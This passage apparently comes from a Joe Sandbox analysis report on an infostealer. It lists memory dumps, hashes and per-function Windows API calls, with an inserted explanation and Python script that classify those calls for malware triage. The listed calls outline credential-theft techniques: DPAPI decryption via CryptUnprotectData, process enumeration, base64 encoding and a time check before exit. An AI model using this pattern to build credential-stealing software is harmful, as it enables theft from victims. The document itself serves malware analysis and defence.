                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &r7~$./$.m$Gl}$WD/9${ /_
                                  • API String ID: 0-3525660750
                                  • Opcode ID: 9ebccf49d38ea5a6ccc082a8be838188098a4c8f00cd31a98fbf311526efb029
                                  • Instruction ID: 0370d932ceacc24800d56f66e4c812f203c40a7e0cbffaafdf339106ef7a9585
                                  • Opcode Fuzzy Hash: 9ebccf49d38ea5a6ccc082a8be838188098a4c8f00cd31a98fbf311526efb029
                                  • Instruction Fuzzy Hash: F1B228F3A082049FE3046E2DEC8577ABBE9EFD4720F1A463DE6C4C7744E93598058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: *;?$`W/$aw_$w3{$}$}
                                  • API String ID: 0-2686939119
                                  • Opcode ID: 8f345bad4f643d6f3db16460d2da9a85538d26a37527cf821e6032a6043b7001
                                  • Instruction ID: 2d26b2a2b1f23ccca8a822c76a880d582877d1caaa2de583d4833107d26403b9
                                  • Opcode Fuzzy Hash: 8f345bad4f643d6f3db16460d2da9a85538d26a37527cf821e6032a6043b7001
                                  • Instruction Fuzzy Hash: CBB207F3A0C6149FE3046E2DEC8567AFBE9EF94720F16453DEAC4C3744EA3558018696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: 6fbc80e0d4378046d1ff0c6b5f88f8801f40d80e87733e669c7944ac6b7f26a9
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: 54417012E19BD9C5CB058B7444A02AEBFB22FD6210F6D82AEC4DD1F7C2C774418AD3A5
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BAC971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BAC97C
                                  • lstrcat.KERNEL32(?,00BC0B47), ref: 00BACA43
                                  • lstrcat.KERNEL32(?,00BC0B4B), ref: 00BACA57
                                  • lstrcat.KERNEL32(?,00BC0B4E), ref: 00BACA78
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 819cac0f9d345c08049ba6760558b8005d31025649cb9c09f6eed195a792c792
                                  • Instruction ID: d1ad23336671c24d66230d0ba9fd9adc3afb21f98b65c2d091d237a044c13215
                                  • Opcode Fuzzy Hash: 819cac0f9d345c08049ba6760558b8005d31025649cb9c09f6eed195a792c792
                                  • Instruction Fuzzy Hash: E6413DB590821EDFDB10DFA4DD89BFEBBB8BB48704F1041A8F509A6280D7745A84CF91
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00BB6C0C
                                  • sscanf.NTDLL ref: 00BB6C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BB6C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BB6C60
                                  • ExitProcess.KERNEL32 ref: 00BB6C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 8020271d6d583c9470348c36d2484e354362173a9d982b90d9dd409553fee7ee
                                  • Instruction ID: 9ef0100e564683a55b14641d8912a3d6b7a6ae5a3349b4a6114029316a006e4a
                                  • Opcode Fuzzy Hash: 8020271d6d583c9470348c36d2484e354362173a9d982b90d9dd409553fee7ee
                                  • Instruction Fuzzy Hash: 3221BBB5D14208AFCF04DFE4E8459EEB7B5FF48300F048569E51AB3250EB749648CB65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BA72AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA72B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BA72E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BA7304
                                  • LocalFree.KERNEL32(?), ref: 00BA730E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: fa9ccc6a003ad3d8c3fbd336c9fc74475a7fa6f3fc5739027e918d0b7602b813
                                  • Instruction ID: 259b52fef5719b558cb100405fe17bfb1f1a0b1181dc2b7264c95ff58c3f1227
                                  • Opcode Fuzzy Hash: fa9ccc6a003ad3d8c3fbd336c9fc74475a7fa6f3fc5739027e918d0b7602b813
                                  • Instruction Fuzzy Hash: 140140B5A48308BFDB10DFA4DC45F9D77B8EB44B00F104054FB49BA2D0DA70AA448B54
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB97AE
                                  • Process32First.KERNEL32(00BC0ACE,00000128), ref: 00BB97C2
                                  • Process32Next.KERNEL32(00BC0ACE,00000128), ref: 00BB97D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00BB97EC
                                  • CloseHandle.KERNEL32(00BC0ACE), ref: 00BB980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: b0088f3eebd717c7c0f19a996ce27b4b9776d57a249dce25ab6fdd6ad2d0dfd3
                                  • Instruction ID: 42af9577a57dc131414ec285a979bba193a628021328ef5611e1d2c9bac23688
                                  • Opcode Fuzzy Hash: b0088f3eebd717c7c0f19a996ce27b4b9776d57a249dce25ab6fdd6ad2d0dfd3
                                  • Instruction Fuzzy Hash: DA010C75A14208AFDB20DFA5CD88BEDBBF8FB08700F1045C8E949A6250EB709A84CF50
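The API lists in the function blocks above (lstrlen followed by CryptStringToBinaryA and lstrcat; GetSystemTime, sscanf and SystemTimeToFileTime ahead of ExitProcess; CryptUnprotectData with WideCharToMultiByte; CreateToolhelp32Snapshot with Process32First/Next and StrCmpCA) are the part of this report an analyst reads first, because co-occurrence inside one function says more than a flat import list. The Python below is an added example, not Joe Sandbox code and not part of the report: it parses API lines in the report's own "name.MODULE(args), ref: VA" form, groups them per "APIs" block, tags each block with a capability when a set of APIs co-occurs, and decodes the flag arguments the report captured (TH32CS_SNAPPROCESS for CreateToolhelp32Snapshot, CRYPTPROTECT_UI_FORBIDDEN for CryptUnprotectData, and CRYPT_STRING_BASE64|CRYPT_STRING_NOCRLF for the 40000001 passed to CryptBinaryToStringA later in this section). The capability names and the rule table are my own choices; the constants are the documented Win32 values; the sample input is an abridged copy of the API lines from this section.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: API lines copied (abridged) from five function blocks in
# this section, in the report's own "name.MODULE(args), ref: VA" form. The
# report ends each block's API list with a "Memory Dump Source" line.
SAMPLE_REPORT = """\
APIs
• lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BAC971
• CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BAC97C
• lstrcat.KERNEL32(?,00BC0B47), ref: 00BACA43
Memory Dump Source
APIs
• GetSystemTime.KERNEL32(?), ref: 00BB6C0C
• sscanf.NTDLL ref: 00BB6C39
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00BB6C52
• ExitProcess.KERNEL32 ref: 00BB6C7A
Memory Dump Source
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BA72E1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BA7304
• LocalFree.KERNEL32(?), ref: 00BA730E
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB97AE
• Process32First.KERNEL32(00BC0ACE,00000128), ref: 00BB97C2
• Process32Next.KERNEL32(00BC0ACE,00000128), ref: 00BB97D7
• StrCmpCA.SHLWAPI(?,00000000), ref: 00BB97EC
Memory Dump Source
APIs
• CryptBinaryToStringA.CRYPT32(00000000,00BA51D4,40000001,00000000,00000000,?,00BA51D4), ref: 00BB9050
Memory Dump Source
"""

# One API line: bullet, Name.MODULE, optional "(arg,...)", then "ref: VA".
API_LINE = re.compile(r"^\W*(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
                      r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Capability tags are my own naming, not Joe Sandbox signatures: a block gets a
# tag when it calls every API in the set.
CAPABILITY_RULES: dict[str, set[str]] = {
    "base64_decode": {"CryptStringToBinaryA"},
    "base64_encode": {"CryptBinaryToStringA"},
    "dpapi_decrypt": {"CryptUnprotectData"},
    "process_enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "time_check_then_exit": {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"},
}

# Win32 constants (wincrypt.h, tlhelp32.h, dpapi.h) for the flag arguments the report captured.
CRYPT_STRING_FORMATS = {0x0: "CRYPT_STRING_BASE64HEADER", 0x1: "CRYPT_STRING_BASE64",
                        0x2: "CRYPT_STRING_BINARY", 0x4: "CRYPT_STRING_HEX", 0x6: "CRYPT_STRING_BASE64_ANY"}
CRYPT_STRING_MODIFIERS = {0x20000000: "CRYPT_STRING_STRICT", 0x40000000: "CRYPT_STRING_NOCRLF",
                          0x80000000: "CRYPT_STRING_NOCR"}
TH32CS_SNAPPROCESS = 0x2
CRYPTPROTECT_UI_FORBIDDEN = 0x1


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]  # as printed by the report; "?" means the value was not recovered
    ref: int         # call-site virtual address


def parse_blocks(text: str) -> list[list[ApiCall]]:
    """Group API lines into one list per 'APIs' header; 'Memory Dump Source' closes a block."""
    blocks: list[list[ApiCall]] = []
    current: list[ApiCall] | None = None
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "APIs":
            current = []
            blocks.append(current)
        elif line == "Memory Dump Source":
            current = None
        elif current is not None and (m := API_LINE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            current.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
    return [b for b in blocks if b]


def decode_crypt_string_flags(flags: int) -> str:
    """Low byte is a format enum, the high bits are OR-ed modifiers."""
    names = [CRYPT_STRING_FORMATS.get(flags & 0xFF, f"format_{flags & 0xFF:#x}")]
    return "|".join(names + [n for bit, n in CRYPT_STRING_MODIFIERS.items() if flags & bit])


def _hex_arg(call: ApiCall, index: int) -> int | None:
    """args[index] as an int when the report shows a concrete value, else None."""
    if index < len(call.args) and re.fullmatch(r"[0-9A-Fa-f]+", call.args[index]):
        return int(call.args[index], 16)
    return None


def annotate(call: ApiCall) -> str | None:
    """Decode the one argument that tells an analyst what the call is for."""
    if call.name in ("CryptBinaryToStringA", "CryptStringToBinaryA") and (f := _hex_arg(call, 2)) is not None:
        return f"dwFlags={decode_crypt_string_flags(f)}"
    if call.name == "CreateToolhelp32Snapshot" and _hex_arg(call, 0) == TH32CS_SNAPPROCESS:
        return "dwFlags=TH32CS_SNAPPROCESS"
    if call.name == "CryptUnprotectData" and _hex_arg(call, 5) == CRYPTPROTECT_UI_FORBIDDEN:
        return "dwFlags=CRYPTPROTECT_UI_FORBIDDEN"
    return None


def summarize(text: str) -> dict[int, dict]:
    """Map each block's lowest call-site VA to its APIs, capability tags and decoded flags."""
    out: dict[int, dict] = {}
    for block in parse_blocks(text):
        names = {c.name for c in block}
        out[min(c.ref for c in block)] = {
            "apis": [c.name for c in block],
            "capabilities": sorted(t for t, need in CAPABILITY_RULES.items() if need <= names),
            "notes": [n for n in map(annotate, block) if n],
        }
    return out


if __name__ == "__main__":
    for va, info in summarize(SAMPLE_REPORT).items():
        print(f"{va:08X}  {', '.join(info['capabilities']):22}  {'; '.join(info['notes'])}")
```

Two caveats when reading the argument columns this way. The values are what the sandbox saw on the stack at the call site, not a parameter-accurate decode: CryptBinaryToStringA takes five parameters but the report prints seven values for it, so only positions the analyst has checked against the prototype (here index 2, dwFlags) should be decoded, and "?" must be treated as unknown rather than zero. The capability rules are deliberately per-block; a tag such as dpapi_decrypt only says the function calls CryptUnprotectData with the UI-forbidden flag, which is consistent with the browser-credential theft the report attributes to Stealc but is not by itself proof of it.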
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 08af92a3f066262f836936b7f9f456b1b21084044b2b87ca93f180327f484345
                                  • Instruction ID: e70451efd5eca980357f0cd951a61e98dbf660ab4430a5fe3f7fcd4dbb17f10e
                                  • Opcode Fuzzy Hash: 08af92a3f066262f836936b7f9f456b1b21084044b2b87ca93f180327f484345
                                  • Instruction Fuzzy Hash: ED63533241EBD41ECB27CB3047B6A917FA6FA1321031D4ACEC5C18F5B3C694AA56E356
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =u5=$C?~{$S]~$v4q6
                                  • API String ID: 0-3509047163
                                  • Opcode ID: 37a0b7d0e7bb78fd9491ec62ca968fb7833d310a5c61ee678360c444e3e0fbf0
                                  • Instruction ID: 529c2ec8f817a0977cf8a32aa7c0400e97cfe45d9fe77c11791537746cdf25d0
                                  • Opcode Fuzzy Hash: 37a0b7d0e7bb78fd9491ec62ca968fb7833d310a5c61ee678360c444e3e0fbf0
                                  • Instruction Fuzzy Hash: 01B209F3A08200AFE704AE2DEC8567AF7E9EF94720F16453DEAC5C3744E63598058697
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00BA51D4,40000001,00000000,00000000,?,00BA51D4), ref: 00BB9050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 699724d8d0dc014267676513dca95998650490e9b022664d1d8f7f6df99cf2eb
                                  • Instruction ID: 4bbb89ffd1d0d7ed62fc369c2dd5ba04c45a245f9894c5deac5496df2bb95d99
                                  • Opcode Fuzzy Hash: 699724d8d0dc014267676513dca95998650490e9b022664d1d8f7f6df99cf2eb
                                  • Instruction Fuzzy Hash: 1E11F570204209EFDF00EF65D884BBA37E9AF89350F508488FA198B250D7B2E9419BA0
                                  APIs
